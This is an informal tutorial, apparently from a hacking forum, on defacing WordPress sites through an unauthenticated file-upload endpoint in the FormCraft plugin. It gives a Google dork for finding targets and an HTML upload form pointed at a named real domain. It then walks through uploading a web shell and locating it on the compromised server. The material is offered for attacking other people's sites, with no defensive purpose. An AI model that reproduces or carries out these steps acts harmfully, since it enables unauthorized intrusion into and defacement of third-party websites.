WORDPRESS FORMCRAFT EXPLOIT

This time I will share WordPress Plugins FormCraft deface tutorial, Follow my steps gradually dont rush..
Requirements:
- Shell
- CSRF script

<form method = "POST" action = "http:// buildfire.com/wp-content/plugins/ formcraft/file-upload/server/php/ upload.php" enctype = "multipart / form-data"> <input type = "file" name = "files []" /> <button> Upload </ button> </ form>

Save the script in HTML extension! example: csrf.html
STEPS
1. Go to www.google.com and paste this dork:
inurl:/wp-content/plugins/formcraft
2. Then select any web
3. And enter the following exploits:
/wp-content/plugins/formcraft/file- upload/server/php/upload.php
E.g site.com/wp-content/plugins/formcraft/file- upload/server/php/upload.php
4. If vuln to our attack, you will see something like this: ( "failed": "No files found") or files []
On a white blank page
5. The next step is to open CSRF script
6. Copy and paste vuln site in CSRF
7. Save it, and then open a shell server and Upload the CRSF script you edited earlier.
8. then run your uploaded script E.G www.site.com/crsf.html
9. A new white blank page will open, upload your own shell there.
10. If shell successful uploaded shell will apear with random simple text: 19860ab123abcd--blabla.php
Lastly Access your shell at http:// www.site.com/wp-content/plugins/ formcraft/fileupload/server/php/files/nameshellrandom.php
wp-content/plugins/ formcraft / sile upload/server/php/ file/ 154897dc834ecb---blabla.php
thats all, i hope you understand the tutor ?? If no you are free to contact the admin.... Good bye!!